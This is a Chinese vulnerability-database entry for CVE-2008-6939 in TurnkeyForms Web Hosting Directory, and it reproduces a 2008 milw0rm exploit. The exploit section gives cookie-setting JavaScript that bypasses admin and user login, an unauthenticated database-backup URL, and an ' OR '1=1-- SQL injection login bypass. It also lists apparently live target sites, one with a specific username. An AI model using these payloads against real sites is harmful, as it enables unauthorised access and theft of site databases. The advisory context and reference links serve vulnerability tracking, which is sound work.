https://www.exploit-db.com/exploits/7107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-105
TurnkeyForms 虚拟主机目录 认证绕过漏洞






漏洞ID | 1116725 | 漏洞类型 | 授权问题 |
发布时间 | 2008-11-12 | 更新时间 | 2009-08-12 |
![]() |
CVE-2008-6939 | ![]() |
CNNVD-200908-105 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
TurnkeyForms虚拟主机目录存在认证绕过漏洞。远程攻击者可以通过(1)通过设置admcookie到1取得管理特权,或(2)通过设置登陆cookie到目标用户名来获得特权。
|漏洞EXP
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | \ | | / _ \ | |/ /
| | _ | || |_ | \| | | | | | | ' /
| |_| | |__ _| | |\ | | |_| | | . \
\____| |_| |_| \_| \___/ |_|\_\
==============================================================================
Turnkeyforms Web Hosting Directory Multiple Vulnerabilities
==============================================================================
[»] Script: [ Turnkeyforms Web Hosting Directory ]
[»] Language: [ PHP ]
[»] Website: [ http://www.turnkeyforms.com/web-hosting-directory.html ]
[»] Type: [ Commercial ]
[»] Report-Date: [ 12.11.2008 ]
[»] Founder: [ G4N0K <mail.ganok[at]gmail.com> ]
===[ DTLZ ]===
[0] Insecure Cookie Handling
# if ($_COOKIE['adm'] == 1)
# {
# if ($request[1] == 'logout')
# {
# setcookie ("adm", "0");
# java_redirect($config['base_url']."admin/?".time());
# }
# $t->assign('logged', 1);
# }
# else {
# if ($request[1] == 'login' && $vars['passwd'] == $config['WebInterfacePassword'])
# {
# setcookie ("adm", "1");
# java_redirect($config['base_url']."admin/?".time());
# }
# $t->assign('logged', 0);
# }
[!] admin Auth bypass, panel => http://localhost/[paht]/admin/
[»] javascript:document.cookie = "adm=1";
[!] users Auth bypass
[»] javascript:document.cookie = "logged=[username]";
javascript:document.cookie = "logged=g4n0k";
[1] Arbitrary Database Backup
[!] we can download a Backup of Database.
[»] http://localhost/[paht]/admin/backup/db
[2] SQLi Auth Bypass
[»] Username : [a_valid_username]
[»] Password : ' OR '1=1--
===[ LIVE ]===
[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/
[»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/backup/db
[»] http://tophostingdirectory.com
username: ideas
password: ' OR '1=1--
javascript:document.cookie = "logged=ideas";
===[ Greetz ]===
[»] ALLAH
[»] Tornado2800 <Tornado2800[at]gmail.com>
[»] Hussain-X <darkangel_g85[at]yahoo.com>
//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...
===============================================================================
exit();
===============================================================================
# milw0rm.com [2008-11-12]
|参考资料
来源:XF
名称:webhostingdirectory-cookie-security-bypass(46586)
链接:http://xforce.iss.net/xforce/xfdb/46586
来源:VUPEN
名称:ADV-2008-3143
链接:http://www.vupen.com/english/advisories/2008/3143
来源:BID
名称:32283
链接:http://www.securityfocus.com/bid/32283
来源:MILW0RM
名称:7107
链接:http://www.milw0rm.com/exploits/7107
来源:SECUNIA
名称:32644
链接:http://secunia.com/advisories/32644
来源:OSVDB
名称:49838
链接:http://osvdb.org/49838
检索漏洞
开始时间
结束时间